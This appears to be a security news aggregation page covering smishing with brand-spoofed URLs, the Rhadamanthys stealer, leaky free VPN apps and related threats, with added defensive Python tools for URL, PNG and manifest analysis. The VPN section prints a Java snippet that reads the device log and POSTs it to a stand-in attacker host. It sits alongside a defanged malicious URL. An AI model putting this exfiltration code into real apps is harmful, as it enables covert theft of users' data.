    The Top 10 Best Account Takeover Protection Tools 2025 present a mix of AI-driven fraud detection, behavioral analytics, passwordless authentication, and dark web monitoring.

    From DataDome’s advanced bot protection to Beyond Identity’s passwordless model and Kount’s identity trust network, each tool addresses account takeover attacks in unique ways.

    Businesses must choose based on scale, integration needs, and industry focus.

    Small-to-medium businesses might prefer Telesign or Sift, while large enterprises with global platforms may rely on Akamai, Forter, or Radware.

    Regardless of the choice, adopting one of these solutions is essential to counter growing ATO attacks in 2025.

    The post Top 10 Best Account Takeover Protection Tools in 2025 appeared first on Cyber Security News.


  • Cybercriminals have launched a sophisticated campaign that leverages brand impersonation techniques to distribute malware through deceptive SMS phishing (smishing) attacks.

    This emerging threat demonstrates an evolution in social engineering tactics, where attackers strategically craft URLs containing trusted brand names to bypass user skepticism and security filters.

    The attack methodology centers on manipulating URL structures to create false legitimacy.

    Threat actors place a recognizable brand name before the “@” symbol in the URL’s authority section, followed by the actual malicious domain. In a URL, everything between “//” and the last “@” is the userinfo component (historically a username and optional password); the browser does not use it to pick a destination and connects to the host after the “@”, so the brand name has no effect on where the link really goes.

    This technique exploits user psychology: recipients read left to right, see the familiar brand first, and rarely scrutinize the full URL structure, much less know what an “@” inside a link means.

    Unit 42 researchers identified that this wave of attacks extends beyond simple URL manipulation, incorporating deceptively named group messaging campaigns and strategically aged hostnames to enhance credibility.

    The attackers have demonstrated particular interest in utilizing .xin domain extensions, which provide an additional layer of obfuscation while maintaining apparent legitimacy.

    The campaigns typically initiate through SMS messages appearing to originate from legitimate organizations, directing recipients to click malicious links for account verification, delivery notifications, or security alerts.

    Upon interaction, these URLs redirect users to credential harvesting pages or trigger automatic malware downloads targeting mobile and desktop platforms.

    Advanced Infection Mechanisms and Domain Tactics

    The sophisticated nature of these attacks lies in their multi-stage infection process and domain preparation strategies. Attackers register domains months in advance and let them age, so that by the time a campaign launches the hostnames no longer trip newly-registered-domain checks and have accumulated a neutral reputation with automated screening.

    The malicious infrastructure employs rotating subdomains and URL shortening services to complicate tracking efforts.

    Example malicious URL structure:
    hxxps://amazon-security@malicious-domain.xin/verify-account

    The payload delivery mechanism utilizes progressive profiling, where initial clicks gather device fingerprinting data before deploying platform-specific malware variants.

    This approach maximizes infection success rates while minimizing detection by security solutions that rely on static URL analysis.
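    As an added example (not part of the Unit 42 findings or the original article), the following Python shows how a defender parses such a URL to recover the host that will actually be contacted and flags the userinfo trick. The brand watch-list, the sample SMS text and the hypothetical malicious-domain.xin host are constructed for illustration; only the .xin signal comes from the report.

```python
import re
from urllib.parse import urlsplit

# Constructed watch-list of brands commonly impersonated in lures; extend it for your users.
WATCHED_BRANDS = ("amazon", "paypal", "apple", "microsoft", "usps", "fedex", "santander")
# The report singles out .xin; add other TLDs you see abused. A weak signal on its own.
SUSPECT_TLDS = (".xin",)

# Matches both live http(s):// and defanged hxxp(s):// links in free text.
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s<>\"']+", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn a defanged hxxp(s):// URL back into something urlsplit understands."""
    return "http" + url[4:] if url[:4].lower() == "hxxp" else url


def analyze_url(url: str) -> dict:
    """Report where a URL really connects and whether its userinfo impersonates a brand.

    RFC 3986: in the authority component, text before '@' is userinfo and is never part of
    the host. The browser resolves and connects to the host after the last '@'.
    """
    parts = urlsplit(refang(url.strip()))
    netloc = parts.netloc
    userinfo = netloc.rpartition("@")[0].lower() if "@" in netloc else ""
    real_host = (parts.hostname or "").lower()

    signals, spoofed = [], []
    if userinfo:
        # Links legitimately sent to end users essentially never carry credentials.
        signals.append("userinfo_in_authority")
        spoofed = [b for b in WATCHED_BRANDS if b in userinfo]
        if spoofed:
            signals.append("brand_in_userinfo")
    if any(real_host.endswith(tld) for tld in SUSPECT_TLDS):
        signals.append("suspect_tld")

    return {
        "input": url,
        "real_host": real_host,
        "userinfo": userinfo,
        "spoofed_brands": spoofed,
        "signals": signals,
        "suspicious": bool(signals),
    }


def scan_sms(text: str) -> list:
    """Extract every URL from an SMS body and analyze each one."""
    urls = [m.rstrip(".,;:!?)") for m in URL_RE.findall(text)]
    return [analyze_url(u) for u in urls]


# Constructed lure modelled on the pattern described above (not a real message).
SAMPLE_SMS = (
    "Amazon: your parcel is on hold. Confirm your details within 24h at "
    "hxxps://amazon-security@malicious-domain.xin/verify-account."
)

if __name__ == "__main__":
    for result in scan_sms(SAMPLE_SMS):
        print(result)
```

    The decisive field is real_host: whatever the message displays, that is the name the device will resolve and connect to. Any userinfo in a link delivered by SMS is worth blocking on its own, before brand matching is even considered.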


    The post Threat Actors Mimic Popular Brands to Deceive Users and Deploy Malware in New Wave of Attacks appeared first on Cyber Security News.


  • Rhadamanthys, a sophisticated multi-modular information stealer, first emerged in September 2022 and has since evolved into one of the most commercially advanced malware offerings on underground forums.

    Originally advertised by the actor “kingcrete2022,” its initial design drew heavily on the earlier Hidden Bee project, enabling rapid feature growth and professional polish.

    Over time, Rhadamanthys steadily gained traction through distribution campaigns such as those built on the ClickFix social-engineering lure, attracting both novice affiliates and seasoned threat actors.

    As of October 2025, the latest 0.9.2 release introduces incremental refinements to its loader architecture, custom executable formats, and evasion routines, reinforcing its position as a long-term business venture rather than a disposable side project.

    Check Point analysts noted that Rhadamanthys is marketed under the “RHAD Security” and “Mythical Origin Labs” brands, complete with a revamped Tor storefront, Telegram support channel, and tiered licensing model.

    The malware is offered at $299 per month for a self-hosted package and $499 per month for a rented server deployment, with enterprise pricing available through individual negotiation.

    Pricing of Rhadamanthys (Source – Check Point)

    This professionalization underscores the developers’ commitment to sustained feature development, robust support, and ongoing customization options.

    Technically, Rhadamanthys is distributed via a polymorphic initial loader available in both .NET and native PE forms. The native 32- and 64-bit loaders unpack into shellcode that deploys a proprietary XS format package containing core modules.

    Each module—ranging from environment checks to the stealer core—is obfuscated in a custom container, requiring specialized conversion tools to reconstruct into standard PE files for analysis.

    Attackers’ website, main view (Source – Check Point)

    The latest modifications in version 0.9.x introduce XS1B and XS2B headers, a streamlined import deobfuscation key, and updated configuration markers swapped from 0x59485221 to 0xBEEF.

    Infection Mechanism

    A key infection vector in Rhadamanthys 0.9.2 involves steganographic delivery of the Stage 3 payload via PNG images rather than the earlier WAV or JPG templates.

    Upon establishing a WebSocket connection to its C2, the embedded Netclient module retrieves a seemingly innocuous PNG that encodes the next-stage package in pixel data.

    The loader processes the image header to locate a shared secret, then applies ChaCha20 decryption followed by LZO decompression to extract the XS2B modules.

    Core deobfuscation routines now use an RC4-based algorithm in place of the prior XOR scheme, which breaks existing IDA analysis scripts until they are updated for the new routine.

    Example RC4 decryption routine (C), the stream cipher the new deobfuscation stage is built on:

    #include <stddef.h>
    #include <stdint.h>

    /* Classic RC4: key scheduling (KSA) followed by keystream generation (PRGA).
       Decryption is the same operation as encryption: XOR the data with the keystream. */
    void rc4_decrypt(uint8_t *data, size_t len, const uint8_t *key, size_t keylen) {
        uint8_t S[256], tmp;
        uint8_t i = 0, j = 0;
        for (int k = 0; k < 256; k++) S[k] = (uint8_t)k;
        /* KSA: permute S under the key */
        for (int k = 0; k < 256; k++) {
            j = (j + S[k] + key[k % keylen]) & 0xFF;
            tmp = S[k]; S[k] = S[j]; S[j] = tmp;
        }
        /* PRGA: one keystream byte per input byte */
        i = j = 0;
        for (size_t k = 0; k < len; k++) {
            i = (i + 1) & 0xFF;
            j = (j + S[i]) & 0xFF;
            tmp = S[i]; S[i] = S[j]; S[j] = tmp;
            data[k] ^= S[(S[i] + S[j]) & 0xFF];
        }
    }

    This shift to PNG-based steganography reduces the need for complex media parsing and simplifies payload retrieval under the guise of ordinary web traffic.

    Once unpacked, Stage 3 modules deploy into a suspended legitimate process chosen from a configurable list, then inject the stealer core to harvest credentials, browser profiles, crypto wallets, and system fingerprints.

    Through this streamlined infection chain and flexible delivery options, Rhadamanthys continues to challenge defenders and underscores the importance of monitoring custom image-based payloads alongside traditional executable attachments.
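    The report describes the PNG carrier but not how to spot one, so here is an added example, not Check Point’s tooling or the malware’s own code, of the defender-side triage for images fetched by a suspicious process: walk the PNG chunks with CRC verification, check that the inflated IDAT data matches the declared geometry, flag bytes after IEND, and measure the entropy of the pixel data. A PNG whose “pixels” are really ChaCha20 output scores near 8 bits per byte, where a photograph or UI graphic does not. The threshold, the fixtures and the minimal greyscale writer are constructed assumptions; the heuristic will miss a carrier that hides a small payload in the low bits of a genuine image.

```python
import math
import random
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Bytes per pixel at 8-bit depth by colour type: grey, RGB, grey+alpha, RGBA.
# Other depths and palette images are out of scope for this example.
BYTES_PER_PIXEL = {(8, 0): 1, (8, 2): 3, (8, 4): 2, (8, 6): 4}


def parse_chunks(data: bytes):
    """Walk the chunk list, verifying every CRC; return (chunks, bytes_after_IEND)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError(f"truncated chunk {ctype!r}")
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on chunk {ctype!r}")
        chunks.append((ctype, body))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, len(data) - pos


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte; 8.0 is indistinguishable from random."""
    if not buf:
        return 0.0
    n = len(buf)
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def inspect_png(data: bytes, entropy_threshold: float = 7.5) -> dict:
    """Structural and statistical checks for a PNG that may be a payload carrier."""
    chunks, trailing = parse_chunks(data)
    ihdr = next(body for ctype, body in chunks if ctype == b"IHDR")
    width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
    if (depth, colour) not in BYTES_PER_PIXEL:
        raise ValueError(f"unsupported format depth={depth} colour={colour}")
    row_len = 1 + width * BYTES_PER_PIXEL[(depth, colour)]   # +1 for the per-row filter byte
    raw = zlib.decompress(b"".join(body for ctype, body in chunks if ctype == b"IDAT"))
    pixels = b"".join(raw[r * row_len + 1:(r + 1) * row_len] for r in range(height))
    entropy = shannon_entropy(pixels)

    findings = []
    if len(raw) != height * row_len:
        findings.append("idat_size_mismatch")      # inflated data disagrees with IHDR geometry
    if entropy > entropy_threshold:
        findings.append("high_entropy_pixels")     # looks like ciphertext, not a picture
    if trailing:
        findings.append("trailing_bytes_after_iend")
    return {"width": width, "height": height, "entropy": round(entropy, 2),
            "trailing": trailing, "findings": findings}


def build_png(width: int, height: int, rows) -> bytes:
    """Minimal 8-bit greyscale PNG writer, used only to construct test fixtures."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        return (struct.pack(">I", len(body)) + ctype + body
                + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(row) for row in rows)   # filter type 0 (None) on every row
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def demo():
    """Constructed fixtures: a smooth gradient versus pseudo-random 'pixels'."""
    w, h = 64, 64
    benign = build_png(w, h, [bytes((x + y) & 0xFF for x in range(w)) for y in range(h)])
    rng = random.Random(1337)
    covert = build_png(w, h, [bytes(rng.getrandbits(8) for _ in range(w)) for _ in range(h)])
    return inspect_png(benign), inspect_png(covert)


if __name__ == "__main__":
    for report in demo():
        print(report)
```

    Run against images a loader pulls over an already-suspicious WebSocket or HTTP session, the entropy check is the discriminating one: a valid PNG that decodes cleanly but carries near-random pixel data is a stronger indicator than any signature on the file header.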


    The post Rhadamanthys Stealer Available on Dark Web Prices Ranging from $299 to $499 appeared first on Cyber Security News.


  • A new toolkit named Impact Solutions has emerged on cybercrime forums, offering a comprehensive, user-friendly framework for crafting advanced phishing campaigns. By democratizing malware delivery, Impact Solutions empowers even low-skill threat actors to bypass both end users and conventional security filters, delivering malicious payloads via seemingly innocuous attachments. This article explores the mechanics of Impact […]

    The post New ‘Point-and-Click’ Phishing Kit Evades Security Filters to Deliver Malicious Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Smartbedded Meteobridge to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, CVE-2025-4008 (CVSS score: 8.7), is a case of command injection in the Meteobridge web interface that could result in code execution. “


  • Mobile VPN apps promise to protect privacy and secure communications on smartphones, but a comprehensive analysis of nearly 800 free Android and iOS VPN applications reveals a troubling reality: many of these tools expose sensitive information rather than shield it.

    From insecure configurations to dangerous permissions and outdated libraries, the apps that millions trust are often the weakest link in both personal and enterprise security.

    The implications of widespread data leakage extend well beyond individual privacy—corporate networks, BYOD policies, and high-value targets all stand to suffer from unexpected exposures.

    Emerging over the past year, this trend exploits users’ desire for cost-free encryption and unrestricted browsing.

    Attackers hiding within otherwise legitimate VPN interfaces can intercept credentials, harvest device identifiers, and even record ambient audio.

    Zimperium analysts noted the discovery of dozens of apps that transmitted unencrypted user metadata to remote servers, bypassing any semblance of secure tunnel encryption.

    These findings underscore how easily threat actors can exploit the trust placed in free VPN services.

    Initial infection vectors vary by platform. On Android, several VPN packages are repackaged with malicious modules that trigger stealth network requests upon app launch.

    On iOS, misconfigured privacy manifests and over-permissive entitlements allow apps to silently collect and exfiltrate location, usage logs, and crash reports. In both ecosystems, a combination of missing certificate validation and exposed APIs creates fertile ground for man-in-the-middle and data-harvesting attacks.

    Many victims remain unaware until unusual network traffic patterns or unexplained account lockouts emerge. Corporate defenders often dismiss free VPNs as harmless productivity tools, inadvertently granting them carte blanche within corporate firewalls.

    By the time logs reveal outbound requests to dubious domains—complete with personal identifiers—the breach is already well underway.

    Permission Abuse and Data Exfiltration

    A critical mechanism enabling these leaks is the abuse of dangerous permissions that far exceed a VPN’s legitimate scope.

    For instance, on Android the READ_LOGS permission lets an app read the system log buffer, which can contain fragments of user input, session tokens and other apps’ debug output, and forward it to an attacker’s server. Since Android 4.1, READ_LOGS is a signature/privileged permission that ordinary third-party apps cannot be granted, so on a current, unrooted device the app sees only its own log lines; the full exposure applies to older devices, rooted devices, and OEM builds or debug configurations that grant it anyway.

    A sample Java snippet below illustrates how a malicious module captures logs and delivers them via HTTP (the collection host is illustrative):

    import java.io.BufferedReader;
    import java.io.InputStreamReader;
    import java.io.OutputStream;
    import java.net.HttpURLConnection;
    import java.net.URL;
    import java.nio.charset.StandardCharsets;

    // Dump the log buffer. Other apps' entries appear only if READ_LOGS is held;
    // on Android 4.1+ an unprivileged app gets just its own lines back.
    Process process = Runtime.getRuntime().exec("logcat -d");
    StringBuilder log = new StringBuilder();
    try (BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()))) {
        String line;
        while ((line = reader.readLine()) != null) {
            log.append(line).append('\n');
        }
    }
    // Exfiltrate the whole capture in one POST; getInputStream() forces the request to be sent.
    HttpURLConnection conn = (HttpURLConnection) new URL("https://malicious.example.com/collect").openConnection();
    conn.setRequestMethod("POST");
    conn.setDoOutput(true);
    try (OutputStream out = conn.getOutputStream()) {
        out.write(log.toString().getBytes(StandardCharsets.UTF_8));
    }
    conn.getInputStream().close();

    This covert channel has nothing to do with the tunnel the app advertises: the captured data is protected only in transit to the attacker’s server, and the user sees no indication that it is happening. On iOS, the comparable overreach is requesting “Always” location authorization (declared through the NSLocationAlwaysAndWhenInUseUsageDescription key in Info.plist), which keeps GPS access in the background and lets the app fuse real-time movement with browsing data.

    Potential security and privacy issues (Source – Zimperium)

    This depicts the prevalence of excessive permissions among analyzed VPN apps. By exploiting permission overreach, these free VPN apps transform trusted privacy tools into surveillance platforms.

    Users and organizations must scrutinize permissions and vet VPN providers rigorously, favoring solutions with transparent security practices and regular code maintenance.
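    Added example, not from the Zimperium report: a permission audit over a decoded AndroidManifest.xml (as produced by apktool) that compares what a supposed VPN client requests against the small set a VPN actually needs, flags the high-risk permissions discussed above (READ_LOGS, RECORD_AUDIO, location, telephony state) and confirms the app even declares a VpnService. The baseline set, the risk table and the com.example.freevpn manifest are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"
A_PERMISSION = f"{{{ANDROID_NS}}}permission"

# Assumed baseline: what a VPN client legitimately needs (not taken from the report).
VPN_BASELINE = {
    "android.permission.INTERNET",
    "android.permission.ACCESS_NETWORK_STATE",
    "android.permission.FOREGROUND_SERVICE",
    "android.permission.POST_NOTIFICATIONS",
    "android.permission.RECEIVE_BOOT_COMPLETED",
}

# Permissions with no business in a VPN app, and why they matter for data leakage.
HIGH_RISK = {
    "android.permission.READ_LOGS": "other apps' log output (signature/privileged since Android 4.1)",
    "android.permission.RECORD_AUDIO": "ambient audio capture",
    "android.permission.READ_SMS": "SMS content, including 2FA codes",
    "android.permission.RECEIVE_SMS": "interception of incoming SMS",
    "android.permission.READ_CONTACTS": "address book harvesting",
    "android.permission.ACCESS_FINE_LOCATION": "precise location tracking",
    "android.permission.ACCESS_BACKGROUND_LOCATION": "location while the app is not in use",
    "android.permission.READ_PHONE_STATE": "device identifiers and telephony state",
    "android.permission.QUERY_ALL_PACKAGES": "full installed-app inventory",
}


def audit_manifest(manifest_xml: str) -> dict:
    """Split requested permissions into high-risk and unexpected sets and check for a VpnService."""
    root = ET.fromstring(manifest_xml)
    requested = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        requested.update(e.get(A_NAME) for e in root.iter(tag) if e.get(A_NAME))
    # A genuine VPN client declares a service guarded by BIND_VPN_SERVICE so only the system can bind it.
    declares_vpn_service = any(
        s.get(A_PERMISSION) == "android.permission.BIND_VPN_SERVICE" for s in root.iter("service")
    )
    high_risk = {p: HIGH_RISK[p] for p in sorted(requested) if p in HIGH_RISK}
    unexpected = sorted(requested - VPN_BASELINE - set(HIGH_RISK))
    if high_risk or not declares_vpn_service:
        verdict = "reject"       # surveillance permissions, or not actually a VPN at all
    elif unexpected:
        verdict = "review"       # outside the baseline but not on the known-bad list
    else:
        verdict = "pass"
    return {
        "package": root.get("package"),
        "declares_vpn_service": declares_vpn_service,
        "high_risk": high_risk,
        "unexpected": unexpected,
        "verdict": verdict,
    }


# Constructed manifest modelled on the permission overreach described above (not a real app).
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.freevpn">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <application>
        <service android:name=".TunnelService"
                 android:permission="android.permission.BIND_VPN_SERVICE">
            <intent-filter><action android:name="android.net.VpnService"/></intent-filter>
        </service>
    </application>
</manifest>"""

if __name__ == "__main__":
    print(audit_manifest(SUSPECT_MANIFEST))
```

    The manifest is the cheapest signal available before any dynamic analysis: a “VPN” that asks for the microphone or the log buffer, or that declares no VpnService at all, should be rejected by an MDM allow-list without further review.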


    The post Hundreds of Free VPN Apps for Both Android and iOS Leaks Users Personal Data appeared first on Cyber Security News.


  • Cisco Talos has revealed that UAT-8099, a Chinese-speaking cybercrime group, has been exploiting vulnerable Internet Information Services (IIS) servers across multiple countries to conduct search engine optimization (SEO) fraud and steal high-value data. Identified in April 2025, this group targets reputable IIS servers in India, Thailand, Vietnam, Canada, and Brazil, focusing on organizations such as […]

    The post IIS Servers Compromised by Chinese Hackers for SEO Manipulation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
